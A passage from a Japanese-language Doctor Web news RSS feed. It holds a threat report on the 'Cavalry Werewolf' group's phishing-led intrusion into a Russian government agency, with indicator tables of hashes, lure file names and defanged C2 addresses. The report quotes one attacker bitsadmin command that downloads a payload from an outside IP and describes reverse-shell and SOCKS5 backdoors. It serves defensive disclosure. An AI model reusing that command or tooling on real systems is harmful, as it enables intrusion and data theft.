のアンチウイルスエンジンによって徹底的に検査します。&lt;/li&gt;&lt;li&gt;脅威を通知・駆除&lt;br&gt;除外リスト内で悪意のあるオブジェクトが検出された場合、ユーザーに通知し、脅威を駆除します。&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;一般ユーザーは、セキュリティシステムが攻撃者に不正操作されていることに気づかないケースが多く存在します。今回の新機能により、マルウェアが痕跡を隠そうとしても、Dr.Web CureIt! がその活動を検知し、確実に排除することが可能となりました。&lt;/p&gt;&lt;h3&gt;■ 今後の予定：Linux 向けプロフェッショナル緊急対応サービス&lt;/h3&gt;&lt;p&gt;Doctor Web では、Windows 向け Dr.Web FixIt! の成功を受け、Linux 向けサービスのフルバージョンリリースに向けた準備を進めています。この新サービスは、企業インフラを狙うサイバー攻撃の調査を行う情報セキュリティ専門家のサポートを目的としています。&lt;br&gt;現時点では、Linux 対応 Dr.Web FixIt! ユーティリティは、システム情報をテクニカルサポートへ送信する用途で利用できます。以下のページからアクセス可能です：&lt;br&gt;&lt;a href="https://free.drweb.co.jp/sysinfo/"&gt;https://free.drweb.co.jp/sysinfo/&lt;/a&gt;&lt;br&gt;さらに、今回の開発成果を生かした 一般ユーザー向け Dr.Web CureIt! の Linux 版 も将来的に登場する予定です。これにより、Linux マシンの迅速なスキャンおよび感染修復が可能になります。&lt;/p&gt;&lt;p&gt;■ Dr.Web CureIt! の新バージョン入手方法&lt;br&gt;Dr.Web CureIt! の最新バージョンは、以下の公式サイトより無料でダウンロードいただけます（個人ユーザーのみ無料）。&lt;br&gt;&lt;a href="https://free.drweb.co.jp/download+cureit+free/"&gt;https://free.drweb.co.jp/download+cureit+free/&lt;/a&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15078&amp;lng=ja</guid><title>ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃</title><link>https://news.drweb.co.jp/show/?i=15078&amp;lng=ja&amp;c=5</link><pubDate>Tue, 11 Nov 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年11月11日&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;序論&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;2025年７月、Doctor Webはクライアントであるロシア政府機関の1つから、内部ネットワークが侵害されている疑いがあるという連絡を受けました。疑いを抱くきっかけとなったのは、同機関のメールアドレスの１つからスパムメールが送信されていることが検出されたことでした。Doctor Webのアンチウイルスラボによるインシデント調査の結果、当該機関はハッカー集団による標的型攻撃を受けていたことが明らかになり、その集団は「Cavalry Werewolf」であることが特定されました。この攻撃は機密情報とネットワーク設定データを収集することを目的の１つとしたものでした。&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;この調査において、Doctor Webのエキスパートはオープンソースツールを含むこれまでに知られていなかったマルウェアを特定することに成功しました。それらの一部として、攻撃対象システム上でのリモートコマンド実行を可能にし、偵察とそれに続くネットワークインフラストラクチャ内での足場固めのための環境を整える複数のバックドアが確認されています。&lt;/p&gt;
&lt;p&gt;本稿では、発見されたCavalry Werewolfのツールや同ハッカー集団の特徴、そしてこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについて解説します。&lt;/p&gt;
&lt;h3&gt;攻撃および使用されたツールに関する全般的情報&lt;/h3&gt;
&lt;p&gt;1台目のコンピューターに対する初期アクセス（最初のアクセス）には一般的な攻撃ベクトルが用いられています。すなわち、文書に偽装したマルウェアの添付されたフィッシングメールです。今回の事例では、攻撃時点で未知のバックドアであった&lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ShellNET.1&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;がメッセージに含まれていました。これはオープンソースソフトウェア&lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt;をベースにしたバックドアで、感染したシステムにリバースシェル経由でリモート接続してさまざまなコマンドを実行することを可能にします。このバックドアはパスワード保護されたアーカイブ内に仕込まれており、フィッシングキャンペーンごとに異なる名前が付いています。&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.ShellNET.1に付けられたファイル名のバリエーション&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;の添付されたフィッシングメールの例：攻撃者は「文書」を読むよう受信者に促し、アーカイブを解凍するためのパスワードを提供している&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;攻撃者は &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt; を使用して標的システム内での足がかりの構築を進めました。ファイル転送タスクを管理するためのWindows標準ツールBitsadmin（&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;）を介して複数の悪意のあるプログラムがダウンロードされています。このプログラムは特定のコマンドラインスイッチを使用して現在のシステム管理者として起動されていました。以下はその例です&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;
    &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt; によって最初にダウンロードされた脅威はスティーラー&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.FileSpyNET.5&amp;lng=ja"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;でした。このトロイの木馬を使用して、攻撃者はコンピューター上に保存されている .doc、.docx、.xlsx、.pdf 形式の文書、テキストファイル（.txt）、画像ファイル （.jpg、.png）をダウンロードしています。
&lt;/p&gt;
&lt;p&gt;
    次に、バックドア&lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.Tunnel.41&amp;lng=ja"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;（オープンソースソフトウェア&lt;a href="ttps://github.com/Acebond/ReverseSocks5"&gt;ReverseSocks5&lt;/a&gt;）がインストールされました。攻撃者はこのバックドアを使用することでSOCKS5トンネルを作成して密かにコンピューターに接続し、そこでコマンドを実行（別のマルウェアをインストールするなど）しています。
&lt;/p&gt;
&lt;h3&gt;Cavalry Werewolfのツール&lt;/h3&gt;
&lt;p&gt;
    今回のインシデントに関する調査の結果、Cavalry Werewolfによる標的型攻撃では上記のマルウェアのみでなく他のツールも多数使用されていることが明らかになりました。Cavalry Werewolfのマルウェア作成者は武器として用いるマルウェアの組み合わせを1つにとどめることなく、その数を常に増やし続けているという点に注意する必要があります。そのため、標的システムへの侵入に使用されるツールや感染チェーンにおけるその先の段階は、攻撃対象となる組織によって異なる場合があります。
&lt;/p&gt;
&lt;h3&gt;エントリーポイント（侵入口）&lt;/h3&gt;
&lt;p&gt;
    感染チェーンの第一段階となるのはCavalry Werewolfから送信されるフィッシングメールに仕込まれたマルウェアです。ただし、それらマルウェアの種類は1つだけではありません。Doctor Webのウイルスアナリストによって以下が特定されています。
&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;スクリプト（&lt;a href="https://vms.drweb.co.jp/search/?q=BAT.DownLoader.1138&amp;lng=ja"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;）&lt;/li&gt;
    &lt;li&gt;実行ファイル（&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Packed2.49708&amp;lng=ja"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;、 &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Siggen31.54011&amp;lng=ja"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;、 &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.Siggen2.5463&amp;lng=ja"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;、 &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.RShell.169&amp;lng=ja"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;、 &lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ReverseShell.10&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;）&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    PowerShellバックドア&lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt;を標的システムにダウンロードするバッチファイルです。このバックドアはコンピューター上に別のマルウェアをダウンロードして起動する目的で攻撃者によって使用されます。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BAT.DownLoader.1138の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    本体内に暗号化された形で格納されているバックドア&lt;b&gt;BackDoor.Spy.4033&lt;/b&gt;をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Trojan.Packed2.49708の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    本体内に暗号化された形で格納されているバックドア&lt;b&gt;BackDoor.Spy.4038&lt;/b&gt;をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。
&lt;/p&gt;
&lt;p&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Siggen31.54011&amp;lng=ja"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;の機能は&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Packed2.49708&amp;lng=ja"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;と似ていますが、ペイロードの抽出アルゴリズムがわずかに異っています。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    Telegramボットを介して操作され、攻撃者から受け取ったタスクを実行するバックドアです。このマルウェアのメイン機能は本体内に隠されたPowerShellコードにあります。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.Siggen2.5463の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;ペイロード&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    攻撃者がリバースシェル経由で感染したコンピューターにリモート接続し、さまざまなコマンドを実行できるようにするバックドアです。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.RShell.169の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    リバースシェルを有効にし、攻撃者にシステムへのリモートアクセスを提供するバックドアです。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.ReverseShell.10の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 12.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
            &lt;/td&gt;
            &lt;td&gt;f546861adc7c8ca88e3b302d274e6fffb63de9b0&lt;/td&gt;
            &lt;td&gt;62[.]113.114[.]209&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;h3&gt;次の感染段階&lt;/h3&gt;
&lt;p&gt;
    デバイスが侵害された後、その感染したデバイス上には以下のマルウェアがインストールされる可能性があります。
&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Inject5.57968&amp;lng=ja"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ShellNET.2&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=BackDoor.ReverseProxy.1&amp;lng=ja"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Packed2.49862&amp;lng=ja"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;本体内に暗号化されたバックドアを持つトロイの木馬です。そのバックドアは、攻撃者が感染したコンピューターに悪意のあるプログラムをダウンロードすることを可能にします。ペイロードの復号化は複数の段階で実行され、そのうちの1つで、Microsoft .NET Frameworkパッケージの一部である&lt;span class="string"&gt;aspnet_compiler.exe&lt;/span&gt;プログラムのプロセスに悪意のあるデータ配列が挿入されます。その後、完全に復号化されたバックドアがこの正規アプリのプロセスコンテキスト内で動作します。&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/cavalry_werewolf/02_vxcube_analysis.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;インタラクティブな脅威アナライザーDr.Web vxCube の「サンドボックス」を使用した、&lt;b&gt;Trojan.Inject5.57968&lt;/b&gt;のアクティビティ調査&lt;/em&gt;&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Trojan.Inject5.57968の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2サーバー&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;ペイロード&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;pickmum1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;e840c521ec436915da71eb9b0cfd56990f4e53e5&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;mummyfile1.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;22641dea0dbe58e71f93615c208610f79d661228&lt;/td&gt;
            &lt;td&gt;64[.]95.11[.]202&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;Trojan.PackedNET.3351&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ShellNET.2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    Telegramボットを介して操作され、攻撃者から受け取ったコマンドを実行するバックドアです。
&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.ShellNET.2の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;win.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;1957fb36537df5d1a29fb7383bc7cde00cd88c77&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;
    オープンソースソフトウェアReverseSocks5をベースにしたバックドアで、感染したシステム上でSOCKS5プロキシを有効にしてリモートアクセスを可能にします。&lt;b&gt;BackDoor.ReverseProxy.1&lt;/b&gt;は &lt;span class="string"&gt;-connect IP&lt;/span&gt;パラメータを指定してコマンドインタープリタcmd.exeから起動されることにより、目的のアドレスに接続します。アドレスがハードコードされている亜種も存在します。
&lt;/p&gt;
&lt;p&gt;以下のIPアドレスが検出されています。&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;78[.]128.112[.]209&lt;/span&gt; (起動コマンドで指定)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;96[.]9.125[.]168&lt;/span&gt; (起動コマンドで指定)&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;188[.]127.231[.]136&lt;/span&gt; (ハードコード)&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;BackDoor.ReverseProxy.1の既知のファイル名&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1ハッシュ&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;revv2.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;6ec8a10a71518563e012f4d24499b12586128c55&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49862&lt;/b&gt;&lt;/p&gt;
